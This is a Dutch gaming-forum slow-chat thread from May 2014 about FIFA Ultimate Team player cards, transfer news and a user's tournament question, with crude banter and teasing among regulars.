SPOILER: de gamertagsOm spoilers te kunnen lezen moet je zijn ingelogd. Je moet je daarvoor eerst gratis Registreren. Ook kun je spoilers niet lezen als je een ban hebt.SPOILEROm spoilers te kunnen lezen moet je zijn ingelogd. Je moet je daarvoor eerst gratis Registreren. Ook kun je spoilers niet lezen als je een ban hebt.![]()
![]()
www.wefut.com
![]()
![]()
Dit is de leven en ik weet dat dit de leven is. En ik weet niet of het nog lang duurt. Maar zolang het er nog even is, geniet ik ervan.
Elke dag
JP zijn app?quote:Op dinsdag 13 mei 2014 15:46 schreef DarkSonic2 het volgende:
Ik zag dus op twitter een tweet van iemand die een miljoen winst maakte op jp zijn app en daar was die screenshot van.
Jij houdt het ook niet lang bij hetzelfde team hequote:Op dinsdag 13 mei 2014 15:48 schreef Maver24 het volgende:
Legend Futre gekochtnu even Effenberg kopen. moet een CM zijn. Ik zou zo graag eens Gullit willen proberen maar dat gaat het niet worden
Hoe duur is Gullit dan?quote:Op dinsdag 13 mei 2014 15:48 schreef Maver24 het volgende:
Legend Futre gekochtnu even Effenberg kopen. moet een CM zijn. Ik zou zo graag eens Gullit willen proberen maar dat gaat het niet worden
Walxie 2.0 dit hoorquote:Op dinsdag 13 mei 2014 15:49 schreef Timmy_Turner het volgende:
[..]
Jij houdt het ook niet lang bij hetzelfde team he
neuh, hahahquote:Op dinsdag 13 mei 2014 15:49 schreef Timmy_Turner het volgende:
[..]
Jij houdt het ook niet lang bij hetzelfde team he
Omgerekend... 150 euro? Hoe kan het dan dat je niet met hem kunt spelen als je er 600 euro ingestopt hebt?quote:
Ja wat is ditquote:Op dinsdag 13 mei 2014 15:50 schreef Kamikazie het volgende:
[..]
Ik zie jou echt alleen reageren op TT
Ben je een beetje verliefd?
Niet een beetjequote:Op dinsdag 13 mei 2014 15:50 schreef Kamikazie het volgende:
[..]
Ik zie jou echt alleen reageren op TT
Ben je een beetje verliefd?
geen idee maar het gaat niet lukken in ieder gevalquote:Op dinsdag 13 mei 2014 15:51 schreef Toefjes het volgende:
[..]
Omgerekend... 150 euro? Hoe kan het dan dat je niet met hem kunt spelen als je er 600 euro ingestopt hebt?
JBGS.quote:Op dinsdag 13 mei 2014 15:52 schreef Maver24 het volgende:
[..]
geen idee maar het gaat niet lukken in ieder geval
quote:Op dinsdag 13 mei 2014 15:51 schreef Toefjes het volgende:
[..]
Omgerekend... 150 euro? Hoe kan het dan dat je niet met hem kunt spelen als je er 600 euro ingestopt hebt?
Lewa staat nu op de transferlijst. Hij mist gewoon kansen voor me. Dat kan niet he, als je zo duur bent.quote:Op dinsdag 13 mei 2014 15:53 schreef rolls-reus het volgende:
[..]![]()
![]()
![]()
Heb je team gezien die je postte vannacht, hoe doet lewa het nu bij jou?
Had ik maar niet geinvesteerd in die flutsite van je. Al wat ik ervoor terugkrijg ik spotquote:
quote:Op dinsdag 13 mei 2014 15:53 schreef Toefjes het volgende:
[..]
Lewa staat nu op de transferlijst. Hij mist gewoon kansen voor me. Dat kan niet he, als je zo duur bent.
quote:
Walxie is toch wel een FOK! FUT legende. Maakte dagelijks 5 teams "voor erbij".quote:Op dinsdag 13 mei 2014 15:53 schreef Timmy_Turner het volgende:
[..]
Had ik maar niet geinvesteerd in die flutsite van je. Al wat ik ervoor terugkrijg ik spot
Niet toen ik hier postte danquote:Op dinsdag 13 mei 2014 15:54 schreef Reemi het volgende:
[..]
Walxie is toch wel een FOK! FUT legende. Maakte dagelijks 5 teams "voor erbij".
Maar die werkt veel beter dan de EA companion cube?quote:
Misschien qua functionaliteit, maar ik vind de interface behoorlijk gaarquote:
PSVquote:Update 13 mei 15.50 uur - PSV dreigt: bijtekenen of geen speelminuten meer
PSV is het gedoe rond Zakaria Bakkali helemaal zat. De aanvaller krijgt geen speeltijd meer in Eindhoven als hij geen handtekening zet onder een nieuwe verbintenis, zo dreigt de club volgens het Eindhovens Dagblad. Ook na een gesprek met zaakwaarnemer Didier Frenay tast PSV nog altijd compleet in het duister over wat de jongeling nou precies wil. PSV hoopt nog altijd dat Bakkali verlengt
4quote:Op dinsdag 13 mei 2014 15:59 schreef ThadCastle het volgende:
[..]
PSV
Dreigen
Moeilijk doen over speeltijd(vanuit PSV gezien)
Bakkali
gr Timmy2
11quote:
RW aubquote:Op dinsdag 13 mei 2014 16:03 schreef Maver24 het volgende:
[ afbeelding ]
ook leuk al denk ik niet dat hij 98 pace zal hebben
Hoe ken die nou een hogere rating hebben dan Pogbaquote:Op dinsdag 13 mei 2014 16:03 schreef Maver24 het volgende:
[ afbeelding ]
LW en ik heb veel profits. Behalve als er een Candreva TOTS komt maar either wayquote:
Iwan zal dat laatste wel leuk vindenquote:Ivan Rakitic kan naar Chelsea en inmiddels is duidelijk wat 'the Blues' ongeveer willen betalen voor de absolute uitblinker van Sevilla. Chelsea heeft enkele miljoenen plus Marko Marin over voor de man die dit seizoen betrokken is bij vrijwel alle doelpunten van Sevilla. De vraag is of Chelsea nog kans maakt, want in het weekend werd gemeld dat Real Madrid Rakitic al bijna binnen heeft. (Football Direct News)
Ivan ook denk ikquote:Op dinsdag 13 mei 2014 16:05 schreef ThadCastle het volgende:
[..]
Iwan zal dat laatste wel leuk vinden
Jaquote:Op dinsdag 13 mei 2014 16:10 schreef Maver24 het volgende:
Zal de De Rossi een re release krijgen morgen ?
Ik hoop het eigenlijk van niet zodat andere erin kunnen komen. die MC was gewoon eigenlijk nutteloos als ze allemaal re releases toch hebbenquote:
quote:Op dinsdag 13 mei 2014 16:15 schreef Rijst het volgende:
[..]
Haha die ken ik nog wel ja. Hij was 11 volgens mij.
Maar verstandelijk op de zelfde niveau als Maver.
Ze krijgen echt niet allemaal een rerelease.quote:Op dinsdag 13 mei 2014 16:13 schreef Maver24 het volgende:
[..]
Ik hoop het eigenlijk van niet zodat andere erin kunnen komen. die MC was gewoon eigenlijk nutteloos als ze allemaal re releases toch hebben
Die zat niet in de meeste predictions hoor.quote:Op dinsdag 13 mei 2014 16:18 schreef Maver24 het volgende:
Cerci zal ook wel weer een re release krijgen
I hope so. Zodra het morgen bekend is dan verwacht ik dat hij net onder de 100k zakt. Misschien dat ik hem dan nog wel haal :pquote:Op dinsdag 13 mei 2014 16:18 schreef Maver24 het volgende:
Dat klopt wel maar je weet het niet met eaquote:Op dinsdag 13 mei 2014 16:19 schreef PrideoftheSouth het volgende:
[..]
Die zat niet in de meeste predictions hoor.
Ik geloof niet dat zowel de Rossi als Cerci een rerelease krijgen.quote:Op dinsdag 13 mei 2014 16:20 schreef Maver24 het volgende:
[..]
Dat klopt wel maar je weet het niet met ea
Wel indegene die doorgaans er het dichtstbij zitquote:Op dinsdag 13 mei 2014 16:17 schreef PrideoftheSouth het volgende:
[..]
Ze krijgen echt niet allemaal een rerelease.
Zit bij Futhead op de bank en staat hoog op het reserve lijstje op ea forum...quote:Op dinsdag 13 mei 2014 16:24 schreef Maver24 het volgende:
Ik hoop op wat verassingen die erbij gaat zitten. een TOTS Candreva zou echt geweldig zijn, zie die gast nergens in lijstje voorbij komen
quote:Op dinsdag 13 mei 2014 16:18 schreef Maver24 het volgende:
quote:Op dinsdag 13 mei 2014 16:20 schreef Maver24 het volgende:
[..]
Dat klopt wel maar je weet het niet met ea
En dat terwijl dat voor jou een makkie zou moeten zijnquote:Op dinsdag 13 mei 2014 16:25 schreef Rijst het volgende:
[..]
Ik zal vannacht ook geen oog dicht doen!
Hoe is TOTS Perez eigk? Die kost geen drol meerquote:Op dinsdag 13 mei 2014 16:26 schreef PrideoftheSouth het volgende:
[..]
En dat terwijl dat voor jou een makkie zou moeten zijn
Krijgt die een release? En die? Wat denken jullie?quote:Op dinsdag 13 mei 2014 16:25 schreef Rijst het volgende:
[..]
Ik zal vannacht ook geen oog dicht doen!
Precies waar ik ook last van hadquote:Op dinsdag 13 mei 2014 15:53 schreef Toefjes het volgende:
[..]
Lewa staat nu op de transferlijst. Hij mist gewoon kansen voor me. Dat kan niet he, als je zo duur bent.
quote:Op dinsdag 13 mei 2014 16:26 schreef PrideoftheSouth het volgende:
[..]
En dat terwijl dat voor jou een makkie zou moeten zijn
Sterk staaltje Maveren was dat weerquote:Op dinsdag 13 mei 2014 16:26 schreef Toefjes het volgende:
[..]
Krijgt die een release? En die? Wat denken jullie?
Daarna: je weet het nooit met EA. Kom op
Best prima, koopje inderdaad.quote:Op dinsdag 13 mei 2014 16:26 schreef Timmy_Turner het volgende:
[..]
Hoe is TOTS Perez eigk? Die kost geen drol meer
Zojuist aangeschaft. Leno ook gewieberd voor Neuer. Reus wacht ik nog mee, vind 60K nog te duur. Heb ik nog zo'n 400K over om het serie A team te versterken met TOTS spelersquote:Op dinsdag 13 mei 2014 16:26 schreef rolls-reus het volgende:
[..]
Precies waar ik ook last van hadmandzukic bevalt me beter
Als hij 99 pace heeft en ik zet er een hunter op, wordt hij dan nog sneller?quote:Op dinsdag 13 mei 2014 16:03 schreef Maver24 het volgende:
[ afbeelding ]
En morgen al de Legends weer verkopen omdat je een Serie A wil maken.quote:Op dinsdag 13 mei 2014 16:35 schreef Maver24 het volgende:
zo jammer dat er geen LB Legend isnu moet ik Schmelzer daar neerzetten
Langzamer volgens een filmpje van Trapzquote:Op dinsdag 13 mei 2014 16:39 schreef DutchSL het volgende:
[..]
Als hij 99 pace heeft en ik zet er een hunter op, wordt hij dan nog sneller?
Gr gr
Onbegrijpelijk dat ze van Maldini een CB hebben gemaakt...quote:Op dinsdag 13 mei 2014 16:35 schreef Maver24 het volgende:
zo jammer dat er geen LB Legend isnu moet ik Schmelzer daar neerzetten
Ik heb al berekend welke Serie A spelers ik in me team kan verwerken dus dat komt wel goed. Pogba, Chiellini, Tevez, Maicon, De Rossiquote:Op dinsdag 13 mei 2014 16:41 schreef Rijst het volgende:
[..]
En morgen al de Legends weer verkopen omdat je een Serie A wil maken.
Prima toch? Heeft hij er in de avond toch lekker mee gespeeld.quote:Op dinsdag 13 mei 2014 16:41 schreef Rijst het volgende:
[..]
En morgen al de Legends weer verkopen omdat je een Serie A wil maken.
Gaat dit over fut?quote:Op dinsdag 13 mei 2014 16:42 schreef planethugo het volgende:
vraagje:
ik wil binnenkort een toernooi met een paar (stuk of 10) vrienden gaan houden bij mij thuis verdeeld over 2 consoles. Hoe kan ik dat het beste aanpakken. Ik wil
- dat iedereen 1x zijn team instelt en dat het dan opgeslagen wordt.
- Een toernooi waarin iedereen 1 of 2x tegen elkaar speelt middels een automatisch (of handmatig in te geven) schema.
- dat het over 2 consoles gesynced wordt, als dat mogelijk is.
Ik zou gewoon loten.quote:Op dinsdag 13 mei 2014 16:42 schreef planethugo het volgende:
vraagje:
ik wil binnenkort een toernooi met een paar (stuk of 10) vrienden gaan houden bij mij thuis verdeeld over 2 consoles. Hoe kan ik dat het beste aanpakken. Ik wil
- Een toernooi waarin iedereen 1 of 2x tegen elkaar speelt middels een automatisch (of handmatig in te geven) schema.
schema is het probleem niet, meer dat je niet per console per wedstrijd terug moet en weer alles in moet stellen. Dan duurt het toernooi 2 dagen vrees ikquote:
Wel jammer dat je Rakitic en Modric niet kan omdraaien. Mooi team verderquote:Op dinsdag 13 mei 2014 16:43 schreef rolls-reus het volgende:
[ afbeelding ]
Speelt tot nu toe erg goedribery en robben wissel ik IG om zodat mandzukic kan doen wat lewa niet deed, scoren
verder is het verdedigingsduo erg goed maar dat mag je ook wel verwachten. Kan ook nog van alles upgraden maar eerst morgen maar eens m'n ibra- serie a team versterken met de nodige tots kaartjes
hopelijk kan ik hier toty alves en tots toure nog aan toevoegen over een tijdje
Courtois op doel natuurlijk
Wat valt er in te stellen, of heeft iedereen custom tactics ofzo? Verbieden dan.quote:Op dinsdag 13 mei 2014 16:45 schreef planethugo het volgende:
[..]
schema is het probleem niet, meer dat je niet per console per wedstrijd terug moet en weer alles in moet stellen. Dan duurt het toernooi 2 dagen vrees ik
Dit is het Slowchat Fut topic. Niet dat dat heel veel uitmaakt verder, maar denk niet dat hier veel mensen je kunnen helpen. Heb een keer gehoord van zo'n toernooi en daar werden alle teams vooraf ingevoerd op fifa zelf, dus dat je de teams zo aanpast dat ze precies goed staan voor degene die ermee speelt. Mag dus wel niemand met hetzelfde team als een ander spelenquote:Op dinsdag 13 mei 2014 16:46 schreef planethugo het volgende:
[..]
is er niet een normaal fifa topic, dit is het slowchat topic ofwat?
Basis 11 en wisselspelers denk ikquote:Op dinsdag 13 mei 2014 16:47 schreef DutchSL het volgende:
[..]
Wat valt er in te stellen, of heeft iedereen custom tactics ofzo? Verbieden dan.
Opstelling aanpassen duurt niet zo lang..
Dat duurt echt niet zo lang..quote:Op dinsdag 13 mei 2014 16:48 schreef Timmy_Turner het volgende:
[..]
Basis 11 en wisselspelers denk ik
Ow sicke hybrid dan. Je had vandaag toch ook Reus en 2 andere blauwe kaartjes gehaald?quote:Op dinsdag 13 mei 2014 16:43 schreef Maver24 het volgende:
[..]
Ik heb al berekend welke Serie A spelers ik in me team kan verwerken dus dat komt wel goed. Pogba, Chiellini, Tevez, Maicon, De Rossi
ok helaas dan zoek ik verder. Denk met al die spelers hier dat iemand er wel een foefje voor heeft.quote:Op dinsdag 13 mei 2014 16:48 schreef Timmy_Turner het volgende:
[..]
Dit is het Slowchat Fut topic. Niet dat dat heel veel uitmaakt verder, maar denk niet dat hier veel mensen je kunnen helpen. Heb een keer gehoord van zo'n toernooi en daar werden alle teams vooraf ingevoerd op fifa zelf, dus dat je de teams zo aanpast dat ze precies goed staan voor degene die ermee speelt. Mag dus wel niemand met hetzelfde team als een ander spelen
Is gewoon irritant, steeds terug naar het beginscherm, steeds controllers selecteren, steeds teams zoeken, steeds opstellingen en tacktiek maken (die verschillen soms met de dag ervoor), steeds weer inladen etc. Met een paar potjes boeit dat natuurlijk niet maar als je met wat meer man bent wil iedereen toch zsm spelenquote:Op dinsdag 13 mei 2014 16:49 schreef DutchSL het volgende:
[..]
Dat duurt echt niet zo lang..
als je je team kent tenminste en niet eerst alle spelers afgaat om hun stats te vergelijken..
Que?quote:Op dinsdag 13 mei 2014 16:55 schreef Timmy_Turner het volgende:
Karim El Ahmadi, Leroy Fer en Andy van der Meijde zitten bij de FC Twente legends
Voor de afscheidswedstrijd van Boschker. Waren niet echt de spelers waar ik snel aan zou denkenquote:
Geen Nkufo?quote:Op dinsdag 13 mei 2014 17:00 schreef Timmy_Turner het volgende:
[..]
Voor de afscheidswedstrijd van Boschker. Waren niet echt de spelers waar ik snel aan zou denken
Jawel die is er ook bijquote:
Ik heb laatst een soortgelijk toernooi gespeeld. Waren gewoon verdeelt in 2 poules. En je moest loten voor je team. Zo hadden we 4.4,5 en 5 sterrenteams.quote:Op dinsdag 13 mei 2014 16:42 schreef planethugo het volgende:
vraagje:
Tegen jezelf pratenquote:Op dinsdag 13 mei 2014 17:07 schreef HugoohAFCA het volgende:
[..]
Ik heb laatst een soortgelijk toernooi gespeeld. Waren gewoon verdeelt in 2 poules. En je moest loten voor je team. Zo hadden we 4.4,5 en 5 sterrenteams.
Die van Belgie danquote:Op dinsdag 13 mei 2014 17:07 schreef Timmy_Turner het volgende:
Hahaha je mocht dus op die slogans voor op de WK-Bussen stemmen. Voor elk land mocht dat, niet alleen voor je eigen land.
Daarom zijn het allemaal van die belachelijke geworden
[ afbeelding ]
[ afbeelding ]
[ afbeelding ]
[ afbeelding ]
had je toen op elke console een apart toernooi gecreeerd of kun je dat ook koppelen aan 2 consoles?quote:Op dinsdag 13 mei 2014 17:07 schreef HugoohAFCA het volgende:
[..]
Ik heb laatst een soortgelijk toernooi gespeeld. Waren gewoon verdeelt in 2 poules. En je moest loten voor je team. Zo hadden we 4.4,5 en 5 sterrenteams.
En die van Nederland en Duitslandquote:
Waarom zou je een toernooi maken? Gewoon 1v1 wedstrijden.quote:Op dinsdag 13 mei 2014 17:11 schreef planethugo het volgende:
[..]
had je toen op elke console een apart toernooi gecreeerd of kun je dat ook koppelen aan 2 consoles?
Of koop een zooi xtc. Heb je een veel leukere avond dan met z'n 10'en Fifa'enquote:Op dinsdag 13 mei 2014 17:12 schreef HugoohAFCA het volgende:
[..]
Waarom zou je een toernooi maken? Gewoon 1v1 wedstrijden.
Dat was bij ons een deel van de prijzenpotquote:Op dinsdag 13 mei 2014 17:15 schreef Toefjes het volgende:
[..]
Of koop een zooi xtc. Heb je een veel leukere avond dan met z'n 10'en Fifa'en
quote:Op dinsdag 13 mei 2014 17:16 schreef HugoohAFCA het volgende:
[..]
Dat was bij ons een deel van de prijzenpot
Ik probeer je alleen maar te helpenquote:Op dinsdag 13 mei 2014 17:18 schreef planethugo het volgende:
stoere reacties zeg, daar heb ik een hoop aan
quote:Op dinsdag 13 mei 2014 17:18 schreef planethugo het volgende:
Joh de tyfes met je kut toernooiquote:Op dinsdag 13 mei 2014 17:18 schreef planethugo het volgende:
Godverquote:
ik vraag iets, reactie: doe gewoon 1 tegen 1. Nee daar was ik nog niet opgekomenquote:Op dinsdag 13 mei 2014 17:19 schreef HugoohAFCA het volgende:
[..]
Ik probeer je alleen maar te helpen
quote:Op dinsdag 13 mei 2014 17:20 schreef planethugo het volgende:
[..]
ik vraag iets, reactie: doe gewoon 1 tegen 1. Nee daar was ik nog niet opgekomen
Je kunt gewoon ergens in het menu zelf een toernooi instellen. Dan moet je alle teams die meedoen enzo instellen.quote:Op dinsdag 13 mei 2014 16:46 schreef planethugo het volgende:
[..]
is er niet een normaal fifa topic, dit is het slowchat topic ofwat?
Dan blijven de teams wel gewoon staan in de eerder opgegeven opstellingenquote:Op dinsdag 13 mei 2014 17:20 schreef planethugo het volgende:
[..]
ik vraag iets, reactie: doe gewoon 1 tegen 1. Nee daar was ik nog niet opgekomen
klopt, is dat niet te regelen dat dat via 2 consoles geregeld kan worden met je profiel ofzo?quote:Op dinsdag 13 mei 2014 17:22 schreef DuTank het volgende:
[..]
Je kunt gewoon ergens in het menu zelf een toernooi instellen. Dan moet je alle teams die meedoen enzo instellen.
Bij mij niet, tenzij je rematch doet.quote:Op dinsdag 13 mei 2014 17:22 schreef el-blanchito het volgende:
[..]
Dan blijven de teams wel gewoon staan in de eerder opgegeven opstellingen
quote:
De optie om een toernooi/competitie te beginnen hadden ze vorig jaar na een update eruit gehaald.quote:Op dinsdag 13 mei 2014 17:20 schreef planethugo het volgende:
[..]
quote:
quote:Op dinsdag 13 mei 2014 17:22 schreef HugoohAFCA het volgende:
[..]Vroeger was er een toernooi mode waar je met veel spelers en teams aan mee kon doen, dacht dat je die bedoelde.
Kutmof
quote:Op dinsdag 13 mei 2014 17:26 schreef Rijst het volgende:
Als ik de naam Hugo denk dan denk ik aan tissues
Iets meer respect graag, voor onze eredivisiewaardige BVOquote:Op dinsdag 13 mei 2014 17:25 schreef planethugo het volgende:
[..]
dat clubje van jou is volgend jaar wel aan de beurt, zelfde gerommel
neem die aub snel terugquote:Op dinsdag 13 mei 2014 17:27 schreef PrideoftheSouth het volgende:
[..]
Iets meer respect graag, voor onze eredivisiewaardige BVO
Doe Keesje Luijckx de groeten, met zijn stap hogerop
quote:Op dinsdag 13 mei 2014 17:30 schreef planethugo het volgende:
[..]
neem die aub snel terug
maar we spreken ons volgend jaar wel weer. Nac is hetzelfde zootje ongeregeld en daar is ook geen geld, kwestie van tijd dus
verder zal ik dit topic maar verlaten, de pubertijd heb ik er al een tijdje opzitten
Soms is het hier ook wel gezellig hoorquote:Op dinsdag 13 mei 2014 17:30 schreef planethugo het volgende:
[..]
neem die aub snel terug
maar we spreken ons volgend jaar wel weer. Nac is hetzelfde zootje ongeregeld en daar is ook geen geld, kwestie van tijd dus
verder zal ik dit topic maar verlaten, de pubertijd heb ik er al een tijdje opzitten
he zeg gedraag je eens, je komt in een FUT topic rare vragen stellen.quote:Op dinsdag 13 mei 2014 17:30 schreef planethugo het volgende:
[..]
neem die aub snel terug
Hij had toch in zijn contract dat hij altijd een pond meer moest verdienen dan de best betaalde speler (op hem na dan uiteraard).quote:Op dinsdag 13 mei 2014 17:33 schreef Timmy_Turner het volgende:
Terry heeft er nog een salarisverhoging bovenop gekregen![]()
Thad blij?
Een stammetjequote:Op dinsdag 13 mei 2014 17:34 schreef Kamikazie het volgende:
h in zijn contract dat hij altijd een pond meer moest verdienen dan de best betaalde speler (op hem na dan uiteraard).
Maar zijn contract liep af, maar ze hebben het nog even verlengd en nu issie de best betaalde verdediger van de PLquote:Op dinsdag 13 mei 2014 17:34 schreef Kamikazie het volgende:
[..]
Hij had toch in zijn contract dat hij altijd een pond meer moest verdienen dan de best betaalde speler (op hem na dan uiteraard).
Ongelofelijk dat je als club aan dit soort dingen meewerktquote:Op dinsdag 13 mei 2014 17:34 schreef Kamikazie het volgende:
[..]
Hij had toch in zijn contract dat hij altijd een pond meer moest verdienen dan de best betaalde speler (op hem na dan uiteraard).
Hij heeft 5 posts de kans gehad om een fatsoenlijk FUT-team te showen. Die kans was niet aan hem besteed.quote:Op dinsdag 13 mei 2014 17:35 schreef Reemi het volgende:
Wat worden nieuwe mensen altijd hartelijk ontvangen.
Die pleuris Rijst deed dat bij mij ook.quote:Op dinsdag 13 mei 2014 17:35 schreef Reemi het volgende:
Wat worden nieuwe mensen altijd hartelijk ontvangen.
quote:Op dinsdag 13 mei 2014 17:37 schreef Toefjes het volgende:
10 vrienden en niemand die een toernooitje in elkaar kan zetten
Is dat na 1 wedstrijd niet een beetje vlugquote:Op dinsdag 13 mei 2014 17:47 schreef Toefjes het volgende:
TOTS Mandzukic is een absolute geweldenaar in de lucht. Eerste wedstrijd 1 goal en 1 assist. De prijs-kwaliteit verhouding is wel beter in vergelijking met TOTS Lewandowski.
Dit dus.quote:Op dinsdag 13 mei 2014 17:48 schreef Timmy_Turner het volgende:
[..]
Is dat na 1 wedstrijd niet een beetje vlug
goeien samplequote:Op dinsdag 13 mei 2014 17:47 schreef Toefjes het volgende:
TOTS Mandzukic is een absolute geweldenaar in de lucht. Eerste wedstrijd 1 goal en 1 assist. De prijs-kwaliteit verhouding is wel beter in vergelijking met TOTS Lewandowski.
Zeker als je dit in ogenschouw neemt:quote:
quote:Op maandag 12 mei 2014 20:41 schreef Toefjes het volgende:
[..]
Ik in de eerste wedstrijd met tots lewa een kopgoal gemaakt.
Ik zie geen PI dus ik denk het nietquote:
Dat vliegende stukje shirt is toch wel een mooi detailquote:
Er zat een verlenging bij.quote:Op dinsdag 13 mei 2014 17:48 schreef Timmy_Turner het volgende:
[..]
Is dat na 1 wedstrijd niet een beetje vlug
Beetje standaard op messi na, normaal staat neymar daarquote:Op dinsdag 13 mei 2014 17:57 schreef Maver24 het volgende:
Zit even naar een stream te kijken op twitch en die gast die maakt even een nieuw team, wat vinden jullie er van ?
[ afbeelding ]
Neymar op CM en Casemiro
Casemiro is verder prima hoor.quote:Op dinsdag 13 mei 2014 17:57 schreef Maver24 het volgende:
Zit even naar een stream te kijken op twitch en die gast die maakt even een nieuw team, wat vinden jullie er van ?
[ afbeelding ]
Neymar op CM en Casemiro
SIF Messi kunnen kopen maar dan IF Alaba kopenquote:Op dinsdag 13 mei 2014 17:57 schreef Maver24 het volgende:
[ afbeelding ]
Neymar op CM en Casemiro
quote:Op dinsdag 13 mei 2014 18:10 schreef Carla24 het volgende:
Op dit moment doe ik op school een onderzoek over sociale uitsluiting bij gokverslaafden. Om een goed beeld te krijgen hoe gokverslaafden sociale uitsluiting ervaren, moet ik 3 personen interviewen die verslaafd zijn, of die verslaafd waren. De interviews gaan geheel anoniem, graag zou ik het met een recorder op willen voor de betrouwbaarheid en validiteit van mijn onderzoek. Dit is alleen voor mij en mijn leerkracht. Ik hoef niet te filmen en ik hoef geen namen bij de interviews te vermelden.
* Sociale uitsluiting is: het proces waarin personen omwille van één of meerdere kenmerken geïsoleerd raken van het maatschappelijk gebeuren. Hierbij kan de omgeving ook op een andere manier tegen je aan gaan kijken en op een andere manier op je reageren. Bijv. negeren en ontwijken.
Het hoeft niet zo te zijn dat je nu nog sociaal geïsoleerd bent, ik bedoel dat als je echt gokverslaafd bent je op een gegeven moment meer geld nodig hebt en steeds vaker aan het gokken bent. Liegt de persoon om aan geld te komen, verwaarloost hij zijn familie en vrienden of kan zijn omgeving niet merken dat hij een verslaving heeft. Hoe reageert de omgeving hier op en hoe ervaar je dit zelf? Dit kan positief of negatief zijn en dat is waar ik achter wil komen door middel van de interviews.
Mijn vraag is nu, is er iemand die bereid is om met mij een interview af te leggen?
Dit komt door lastpostquote:Op dinsdag 13 mei 2014 18:10 schreef Carla24 het volgende:
Op dit moment doe ik op school een onderzoek over sociale uitsluiting bij gokverslaafden. Om een goed beeld te krijgen hoe gokverslaafden sociale uitsluiting ervaren, moet ik 3 personen interviewen die verslaafd zijn, of die verslaafd waren. De interviews gaan geheel anoniem, graag zou ik het met een recorder op willen voor de betrouwbaarheid en validiteit van mijn onderzoek. Dit is alleen voor mij en mijn leerkracht. Ik hoef niet te filmen en ik hoef geen namen bij de interviews te vermelden.
* Sociale uitsluiting is: het proces waarin personen omwille van één of meerdere kenmerken geïsoleerd raken van het maatschappelijk gebeuren. Hierbij kan de omgeving ook op een andere manier tegen je aan gaan kijken en op een andere manier op je reageren. Bijv. negeren en ontwijken.
Het hoeft niet zo te zijn dat je nu nog sociaal geïsoleerd bent, ik bedoel dat als je echt gokverslaafd bent je op een gegeven moment meer geld nodig hebt en steeds vaker aan het gokken bent. Liegt de persoon om aan geld te komen, verwaarloost hij zijn familie en vrienden of kan zijn omgeving niet merken dat hij een verslaving heeft. Hoe reageert de omgeving hier op en hoe ervaar je dit zelf? Dit kan positief of negatief zijn en dat is waar ik achter wil komen door middel van de interviews.
Mijn vraag is nu, is er iemand die bereid is om met mij een interview af te leggen?
We weten allemaal wie hier geschikt voor isquote:Op dinsdag 13 mei 2014 18:10 schreef Carla24 het volgende:
Je zit wel in een geschikt topic.quote:Op dinsdag 13 mei 2014 18:10 schreef Carla24 het volgende:
Packs openen? Gokken op een goede speler? gr grquote:Op dinsdag 13 mei 2014 18:13 schreef Maver24 het volgende:
Ik ga geen Interview afleggen. heb wel wat beters te doen
hahaquote:Op dinsdag 13 mei 2014 18:13 schreef Maver24 het volgende:
Pijnlijk dit.quote:Op dinsdag 13 mei 2014 18:13 schreef Maver24 het volgende:
Geloof je het zelf?quote:Op dinsdag 13 mei 2014 18:14 schreef Maver24 het volgende:
[..]
Neuh, heb al sinds vorige week woensdag geen packs meer geopend![]()
Pots kom er maar inquote:Op dinsdag 13 mei 2014 18:13 schreef Maver24 het volgende:
quote:Op dinsdag 13 mei 2014 18:11 schreef Toefjes het volgende:
[..]
Dit komt door lastpost![]()
R&P / Gokverslaving interview
quote:Op dinsdag 13 mei 2014 18:16 schreef wieisboos het volgende:
[..]
Raar dat je vorige week donderdag Sturridge in een pack kreeg dan
quote:
Dan was het een donderdag geweest. Ik had toen TOTS Alaba gehad. Toen ik klaar was met packs opeenen heb ik geen pack meer geopend. morgen pas weerquote:Op dinsdag 13 mei 2014 18:16 schreef wieisboos het volgende:
[..]
Raar dat je vorige week donderdag Sturridge in een pack kreeg dan
HMF. Die lult zoveel dat haar leraar genoegen neemt met slechts 1 interview.quote:Op dinsdag 13 mei 2014 18:11 schreef Timmy_Turner het volgende:
[..]
We weten allemaal wie hier geschikt voor is![]()
![]()
Zo is het, eet smakelijk ouwe reus.quote:Op dinsdag 13 mei 2014 18:19 schreef Maver24 het volgende:
Gaan jullie maar een discussie houden . Ik ga lekker eten.
Eens. (waarschijnlijk gaat 'ie me nu DM'en met veel smileys en hoofdletters.)quote:Op dinsdag 13 mei 2014 18:18 schreef eight het volgende:
[..]
HMF. Die lult zoveel dat haar leraar genoegen neemt met slechts 1 interview.
quote:Op dinsdag 13 mei 2014 18:18 schreef eight het volgende:
[..]
HMF. Die lult zoveel dat haar leraar genoegen neemt met slechts 1 interview.
Met Mayonaise? Smakelijk!quote:Op dinsdag 13 mei 2014 18:19 schreef Maver24 het volgende:
Gaan jullie maar een discussie houden . Ik ga lekker eten.
packs openenquote:Op dinsdag 13 mei 2014 18:13 schreef Maver24 het volgende:
Ik denk dat zijn gruwelijke pot al lekker op tafel staat.quote:
laat zijn vriendin er even buitenquote:Op dinsdag 13 mei 2014 18:22 schreef MrvanTrapZ het volgende:
[..]
Ik denk dat zijn gruwelijke pot al lekker op tafel staat.
Weer een reden om te drinken.quote:Op dinsdag 13 mei 2014 18:26 schreef Kamikazie het volgende:
Minder dan een maandje tot het WK
Zin in
Haha prachtig dit.quote:Op dinsdag 13 mei 2014 18:11 schreef Toefjes het volgende:
[..]
Dit komt door lastpost![]()
R&P / Gokverslaving interview
Jack ryan shadow recruit vond ik wel een toffe film.quote:Op dinsdag 13 mei 2014 18:27 schreef Kamikazie het volgende:
Iemand nog een leuke serie/film ofzo?Timdb86?
Jij verdraait het, het gaat erom dat Maver24 zegt dat ie wat beters te doen heeft. Dat hij ook in de wajong zit betrek jij er weer bij.... beetje goedkoop scoren over de rug van de zwakke van deze samenleving he.quote:Op dinsdag 13 mei 2014 18:29 schreef FCsuarez het volgende:
Lachen gieren brullen dit een wajonger die zegt dat hij wel wat beters te doen heeft
Al gezienquote:Op dinsdag 13 mei 2014 18:30 schreef Tim86 het volgende:
[..]
Jack ryan shadow recruit vond ik wel een toffe film.
The Physicianquote:Op dinsdag 13 mei 2014 18:27 schreef Kamikazie het volgende:
Iemand nog een leuke serie/film ofzo?Timdb86?
Kijk je Arrow, Agents of S.H.I.E.L.D., Banshee?quote:
Arrow welquote:Op dinsdag 13 mei 2014 18:32 schreef Tim86 het volgende:
[..]
Kijk je Arrow, Agents of S.H.I.E.L.D., Banshee?
